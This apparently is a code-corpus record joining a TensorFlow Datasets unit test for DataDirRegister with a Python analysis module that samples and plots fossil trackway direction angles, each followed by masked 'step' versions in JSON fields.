# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_datasets.core.community.register_path."""
from etils import epath
from tensorflow_datasets.core.community import register_path
def test_data_dir_register():
register = register_path.DataDirRegister(
namespace_to_data_dirs={'ns1': [epath.Path('/path/ns1')]})
assert {'ns1'} == register.namespaces
|
normal
|
{
"blob_id": "ed65d7e0de3fc792753e34b77254bccc8cee6d66",
"index": 3657,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(namespace_to_data_dirs={'ns1':\n [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
"step-3": "<mask token>\nfrom etils import epath\nfrom tensorflow_datasets.core.community import register_path\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(namespace_to_data_dirs={'ns1':\n [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
"step-4": "# coding=utf-8\n# Copyright 2022 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for tensorflow_datasets.core.community.register_path.\"\"\"\n\nfrom etils import epath\nfrom tensorflow_datasets.core.community import register_path\n\n\ndef test_data_dir_register():\n register = register_path.DataDirRegister(\n namespace_to_data_dirs={'ns1': [epath.Path('/path/ns1')]})\n assert {'ns1'} == register.namespaces\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# TrackwayDirectionStage.py
# (C)2014-2015
# Scott Ernst
from __future__ import print_function, absolute_import, unicode_literals, division
from collections import namedtuple
import math
from pyaid.number.NumericUtils import NumericUtils
from cadence.analysis.CurveOrderedAnalysisStage import CurveOrderedAnalysisStage
from cadence.analysis.shared.LineSegment2D import LineSegment2D
from pyaid.number.PositionValue2D import PositionValue2D
from cadence.analysis.shared.plotting.MultiScatterPlot import MultiScatterPlot
from cadence.svg.CadenceDrawing import CadenceDrawing
#*************************************************************************************************** TrackwayDirectionStage
class TrackwayDirectionStage(CurveOrderedAnalysisStage):
"""A class for..."""
#===============================================================================
# C L A S S
SAMPLE_DATA_NT = namedtuple('SAMPLE_DATA_NT', [
'directionAngle', # Angle instance for the calculated trackway heading
'position', # Spatial position of the angle reference point
'curvePoint', # For plotting (curvePosition, directionAngle, curvePosUnc, directionAngleUnc)
'curvePosition', # ValueUncertainty object representing position along curve
'track' ]) # Track used to reference this sample
MAPS_FOLDER_NAME = 'Trackway-Direction'
COLORS = ['#AAAAAA', 'black', 'blue', 'green', 'red']
#_______________________________________________________________________________
def __init__(self, key, owner, **kwargs):
"""Creates a new instance of TrackwayDirectionStage."""
super(TrackwayDirectionStage, self).__init__(
key, owner,
label='Trackway Direction',
**kwargs)
self._paths = []
#===============================================================================
# G E T / S E T
#_______________________________________________________________________________
@property
def trackHeadingData(self):
return self.owner.getStage('heading').trackwaysData
#_______________________________________________________________________________
@property
def trackwayDirectionData(self):
return self.owner.cache.get('trackwayDirectionData')
#===============================================================================
# P R O T E C T E D
#_______________________________________________________________________________
def _preAnalyze(self):
self.owner.cache.set('trackwayDirectionData', {})
#_______________________________________________________________________________
def _analyzeSitemap(self, sitemap):
"""_analyzeSitemap doc..."""
self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME)
super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)
self._saveDrawing(sitemap)
#_______________________________________________________________________________
def _analyzeTrackway(self, trackway, sitemap):
if trackway.uid not in self.trackHeadingData:
return
bundle = self.owner.getSeriesBundle(trackway)
# Create a list of window sizes to test trimmed to account for small trackways with fewer
# points than a specified size
maxWindowSize = min(8, int(0.5*float(bundle.count)))
windowSizes = [1, 2, 4, 6, 8]
while maxWindowSize < windowSizes[-1]:
windowSizes.pop()
samples = []
for i in windowSizes:
# For each valid window size create a sample entry
samples.append({'size':i + 1, 'values':self._sampleTrackway(trackway, i + 1) })
self._plotTrackwaySamples(trackway, samples)
self._drawTrackwaySamples(sitemap, samples)
self.trackwayDirectionData[trackway.uid] = {'trackway':trackway, 'samples':samples}
#_______________________________________________________________________________
def _drawTrackwaySamples(self, sitemap, samples):
"""_drawTrackwaySamples doc..."""
drawing = sitemap.cache.get('drawing')
for sample in samples:
color = self.COLORS[samples.index(sample)]
if len(sample['values']) < 2:
continue
prev = sample['values'][0].position
for value in sample['values'][1:]:
pos = value.position
drawing.line(
prev.toMayaTuple(), pos.toMayaTuple(),
stroke=color, stroke_width=1, stroke_opacity='0.75')
prev = pos
for value in sample['values']:
pos = value.position
drawing.circle(
pos.toMayaTuple(), 5,
stroke='none', fill=color, fill_opacity='0.75')
#_______________________________________________________________________________
def _plotTrackwaySamples(self, trackway, samples):
"""_plotTrackwaySamples doc..."""
bundle = self.owner.getSeriesBundle(trackway)
plot = MultiScatterPlot(
title='%s Direction Sampling %s' % (trackway.name, bundle.echoStatus(asPercent=True)),
xLabel='Trackway Curve Position (m)',
yLabel='Direction (degrees)')
for sample in samples:
color = self.COLORS[samples.index(sample)]
data = []
for value in sample['values']:
data.append(value.curvePoint)
plot.addPlotSeries(data=data, color=color, line=True)
self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))
#_______________________________________________________________________________
def _sampleTrackway(self, trackway, windowSize):
"""
Samples the trackway and returns result
@type trackway: * """
window = []
samples = []
entries = self.trackHeadingData[trackway.uid]['entries']
analysisTrackway = trackway.getAnalysisPair(self.analysisSession)
for entry in entries:
# For each track entry in the trackways data add that to the sample window and update
# the samples result
window.append(entry)
if len(window) < windowSize:
# Don't create a sample until the sub-sample list exceeds the sample window size
continue
xTests = [] # X spatial position values
yTests = [] # Y spatial position values
angleTests = [] # Heading angle values
curvePosTests = [] # Curve position values
for item in window:
# Calculate weighted averages for various properties of the current sample window
angle = item.headingAngle
angleTests.append(angle.valueDegrees)
# Create a ValueUncertainty for the curve position by using the fractional
# positional uncertainty over the spatial length of the curve
posValue = item.track.positionValue
posUnc = math.sqrt(posValue.xUnc**2 + posValue.yUnc**2)
curvePos = item.track.getAnalysisPair(self.analysisSession).curvePosition
curvePosUnc = abs(posUnc/analysisTrackway.curveLength)
curvePosTests.append(NumericUtils.toValueUncertainty(curvePos, curvePosUnc))
pv = item.track.positionValue
xTests.append(pv.xValue)
yTests.append(pv.yValue)
directionAngleMean = NumericUtils.weightedAverage(*angleTests)
curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)
xValue = NumericUtils.weightedAverage(*xTests)
yValue = NumericUtils.weightedAverage(*yTests)
position = PositionValue2D(
x=xValue.raw, xUnc=xValue.rawUncertainty,
y=yValue.raw, yUnc=yValue.rawUncertainty)
# Remove the oldest sample from the to make room for a new sample in the next iteration
window.pop(0)
if len(samples) > 0:
# Compare this sample to the previous one and if it does not differ
# significantly then continue to continue to the next iteration
last = samples[-1].directionAngle
totalUnc = last.rawUncertainty + directionAngleMean.rawUncertainty
deviation = abs(directionAngleMean.raw - last.raw)/totalUnc
if deviation < 2.0:
continue
samples.append(self.SAMPLE_DATA_NT(
directionAngle=directionAngleMean,
position=position,
curvePoint=(
curvePositionMean.value, directionAngleMean.value,
curvePositionMean.uncertainty, directionAngleMean.uncertainty),
curvePosition=curvePositionMean,
track=entry.track ))
self._extendSamplesToTrackwayStart(entries[0], samples)
self._extendSampleToTrackwayEnd(entries[-1], samples)
return samples
#_______________________________________________________________________________
def _extendSamplesToTrackwayStart(self, firstEntry, samples):
"""_extendSamplesToTrackwayStart doc..."""
if len(samples) < 2 or samples[0].track == firstEntry.track:
# If there aren't enough samples, or the samples already extend to the end of the
# trackway, return the samples without adding on an end point
return
line = LineSegment2D(
start=samples[0].position.clone(),
end=samples[1].position.clone())
firstTrack = firstEntry.track
analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)
position = line.closestPointOnLine(firstTrack.positionValue, False)
samples.insert(0, self.SAMPLE_DATA_NT(
directionAngle=samples[0].directionAngle.clone(),
position=position,
curvePoint=(
analysisTrack.curvePosition, samples[0].directionAngle.value,
0, samples[-1].directionAngle.uncertainty),
curvePosition=samples[0].curvePosition.clone(),
track=firstTrack ))
#_______________________________________________________________________________
def _extendSampleToTrackwayEnd(self, lastEntry, samples):
if len(samples) < 2 or samples[-1].track == lastEntry.track:
# If there aren't enough samples, or the samples already extend to the end of the
# trackway, return the samples without adding on an end point
return
line = LineSegment2D(
start=samples[-2].position.clone(),
end=samples[-1].position.clone())
lastTrack = lastEntry.track
analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)
position = line.closestPointOnLine(lastTrack.positionValue, False)
ha = samples[-1].directionAngle.clone()
samples.append(self.SAMPLE_DATA_NT(
directionAngle=ha,
position=position,
curvePoint=(analysisTrack.curvePosition, ha.value, 0, ha.uncertainty),
curvePosition=samples[-1].curvePosition.clone(),
track=lastTrack ))
#_______________________________________________________________________________
def _postAnalyze(self):
self.mergePdfs(self._paths, 'Trackway-Direction.pdf')
|
normal
|
{
"blob_id": "a721adaaa69bf09c2ea259f12bea05515c818679",
"index": 5327,
"step-1": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n <mask token>\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n <mask token>\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n <mask token>\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n <mask token>\n\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n <mask token>\n\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n bundle = self.owner.getSeriesBundle(trackway)\n plot = MultiScatterPlot(title='%s Direction Sampling %s' % (\n trackway.name, bundle.echoStatus(asPercent=True)), xLabel=\n 'Trackway Curve Position (m)', yLabel='Direction (degrees)')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n for value in sample['values']:\n data.append(value.curvePoint)\n plot.addPlotSeries(data=data, color=color, line=True)\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n return\n line = LineSegment2D(start=samples[0].position.clone(), end=samples\n [1].position.clone())\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n samples.insert(0, self.SAMPLE_DATA_NT(directionAngle=samples[0].\n directionAngle.clone(), position=position, curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value, 0,\n samples[-1].directionAngle.uncertainty), curvePosition=samples[\n 0].curvePosition.clone(), track=firstTrack))\n\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(key, owner, label=\n 'Trackway Direction', **kwargs)\n self._paths = []\n\n @property\n def trackHeadingData(self):\n return self.owner.getStage('heading').trackwaysData\n\n @property\n def trackwayDirectionData(self):\n return self.owner.cache.get('trackwayDirectionData')\n\n def _preAnalyze(self):\n self.owner.cache.set('trackwayDirectionData', {})\n\n def _analyzeSitemap(self, sitemap):\n \"\"\"_analyzeSitemap doc...\"\"\"\n self._createDrawing(sitemap, 'SAMPLED-DIRECTION', self.MAPS_FOLDER_NAME\n )\n super(TrackwayDirectionStage, self)._analyzeSitemap(sitemap)\n self._saveDrawing(sitemap)\n\n def _analyzeTrackway(self, trackway, sitemap):\n if trackway.uid not in self.trackHeadingData:\n return\n bundle = self.owner.getSeriesBundle(trackway)\n maxWindowSize = min(8, int(0.5 * float(bundle.count)))\n windowSizes = [1, 2, 4, 6, 8]\n while maxWindowSize < windowSizes[-1]:\n windowSizes.pop()\n samples = []\n for i in windowSizes:\n samples.append({'size': i + 1, 'values': self._sampleTrackway(\n trackway, i + 1)})\n self._plotTrackwaySamples(trackway, samples)\n self._drawTrackwaySamples(sitemap, samples)\n self.trackwayDirectionData[trackway.uid] = {'trackway': trackway,\n 'samples': samples}\n\n def _drawTrackwaySamples(self, sitemap, samples):\n \"\"\"_drawTrackwaySamples doc...\"\"\"\n drawing = sitemap.cache.get('drawing')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n if len(sample['values']) < 2:\n continue\n prev = sample['values'][0].position\n for value in sample['values'][1:]:\n pos = value.position\n drawing.line(prev.toMayaTuple(), pos.toMayaTuple(), stroke=\n color, stroke_width=1, stroke_opacity='0.75')\n prev = pos\n for value in sample['values']:\n pos = value.position\n drawing.circle(pos.toMayaTuple(), 5, stroke='none', fill=\n color, fill_opacity='0.75')\n\n def _plotTrackwaySamples(self, trackway, samples):\n \"\"\"_plotTrackwaySamples doc...\"\"\"\n bundle = self.owner.getSeriesBundle(trackway)\n plot = MultiScatterPlot(title='%s Direction Sampling %s' % (\n trackway.name, bundle.echoStatus(asPercent=True)), xLabel=\n 'Trackway Curve Position (m)', yLabel='Direction (degrees)')\n for sample in samples:\n color = self.COLORS[samples.index(sample)]\n data = []\n for value in sample['values']:\n data.append(value.curvePoint)\n plot.addPlotSeries(data=data, color=color, line=True)\n self._paths.append(plot.save(self.getTempFilePath(extension='pdf')))\n\n def _sampleTrackway(self, trackway, windowSize):\n \"\"\"\n Samples the trackway and returns result\n @type trackway: * \"\"\"\n window = []\n samples = []\n entries = self.trackHeadingData[trackway.uid]['entries']\n analysisTrackway = trackway.getAnalysisPair(self.analysisSession)\n for entry in entries:\n window.append(entry)\n if len(window) < windowSize:\n continue\n xTests = []\n yTests = []\n angleTests = []\n curvePosTests = []\n for item in window:\n angle = item.headingAngle\n angleTests.append(angle.valueDegrees)\n posValue = item.track.positionValue\n posUnc = math.sqrt(posValue.xUnc ** 2 + posValue.yUnc ** 2)\n curvePos = item.track.getAnalysisPair(self.analysisSession\n ).curvePosition\n curvePosUnc = abs(posUnc / analysisTrackway.curveLength)\n curvePosTests.append(NumericUtils.toValueUncertainty(\n curvePos, curvePosUnc))\n pv = item.track.positionValue\n xTests.append(pv.xValue)\n yTests.append(pv.yValue)\n directionAngleMean = NumericUtils.weightedAverage(*angleTests)\n curvePositionMean = NumericUtils.weightedAverage(*curvePosTests)\n xValue = NumericUtils.weightedAverage(*xTests)\n yValue = NumericUtils.weightedAverage(*yTests)\n position = PositionValue2D(x=xValue.raw, xUnc=xValue.\n rawUncertainty, y=yValue.raw, yUnc=yValue.rawUncertainty)\n window.pop(0)\n if len(samples) > 0:\n last = samples[-1].directionAngle\n totalUnc = (last.rawUncertainty + directionAngleMean.\n rawUncertainty)\n deviation = abs(directionAngleMean.raw - last.raw) / totalUnc\n if deviation < 2.0:\n continue\n samples.append(self.SAMPLE_DATA_NT(directionAngle=\n directionAngleMean, position=position, curvePoint=(\n curvePositionMean.value, directionAngleMean.value,\n curvePositionMean.uncertainty, directionAngleMean.\n uncertainty), curvePosition=curvePositionMean, track=entry.\n track))\n self._extendSamplesToTrackwayStart(entries[0], samples)\n self._extendSampleToTrackwayEnd(entries[-1], samples)\n return samples\n\n def _extendSamplesToTrackwayStart(self, firstEntry, samples):\n \"\"\"_extendSamplesToTrackwayStart doc...\"\"\"\n if len(samples) < 2 or samples[0].track == firstEntry.track:\n return\n line = LineSegment2D(start=samples[0].position.clone(), end=samples\n [1].position.clone())\n firstTrack = firstEntry.track\n analysisTrack = firstTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(firstTrack.positionValue, False)\n samples.insert(0, self.SAMPLE_DATA_NT(directionAngle=samples[0].\n directionAngle.clone(), position=position, curvePoint=(\n analysisTrack.curvePosition, samples[0].directionAngle.value, 0,\n samples[-1].directionAngle.uncertainty), curvePosition=samples[\n 0].curvePosition.clone(), track=firstTrack))\n\n def _extendSampleToTrackwayEnd(self, lastEntry, samples):\n if len(samples) < 2 or samples[-1].track == lastEntry.track:\n return\n line = LineSegment2D(start=samples[-2].position.clone(), end=\n samples[-1].position.clone())\n lastTrack = lastEntry.track\n analysisTrack = lastTrack.getAnalysisPair(self.analysisSession)\n position = line.closestPointOnLine(lastTrack.positionValue, False)\n ha = samples[-1].directionAngle.clone()\n samples.append(self.SAMPLE_DATA_NT(directionAngle=ha, position=\n position, curvePoint=(analysisTrack.curvePosition, ha.value, 0,\n ha.uncertainty), curvePosition=samples[-1].curvePosition.clone(\n ), track=lastTrack))\n\n def _postAnalyze(self):\n self.mergePdfs(self._paths, 'Trackway-Direction.pdf')\n",
"step-5": "# TrackwayDirectionStage.py\n# (C)2014-2015\n# Scott Ernst\n\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\nfrom collections import namedtuple\nimport math\n\nfrom pyaid.number.NumericUtils import NumericUtils\n\nfrom cadence.analysis.CurveOrderedAnalysisStage import CurveOrderedAnalysisStage\nfrom cadence.analysis.shared.LineSegment2D import LineSegment2D\nfrom pyaid.number.PositionValue2D import PositionValue2D\nfrom cadence.analysis.shared.plotting.MultiScatterPlot import MultiScatterPlot\nfrom cadence.svg.CadenceDrawing import CadenceDrawing\n\n#*************************************************************************************************** TrackwayDirectionStage\nclass TrackwayDirectionStage(CurveOrderedAnalysisStage):\n \"\"\"A class for...\"\"\"\n\n#===============================================================================\n# C L A S S\n\n SAMPLE_DATA_NT = namedtuple('SAMPLE_DATA_NT', [\n 'directionAngle', # Angle instance for the calculated trackway heading\n 'position', # Spatial position of the angle reference point\n 'curvePoint', # For plotting (curvePosition, directionAngle, curvePosUnc, directionAngleUnc)\n 'curvePosition', # ValueUncertainty object representing position along curve\n 'track' ]) # Track used to reference this sample\n\n MAPS_FOLDER_NAME = 'Trackway-Direction'\n\n COLORS = ['#AAAAAA', 'black', 'blue', 'green', 'red']\n\n#_______________________________________________________________________________\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of TrackwayDirectionStage.\"\"\"\n super(TrackwayDirectionStage, self).__init__(\n 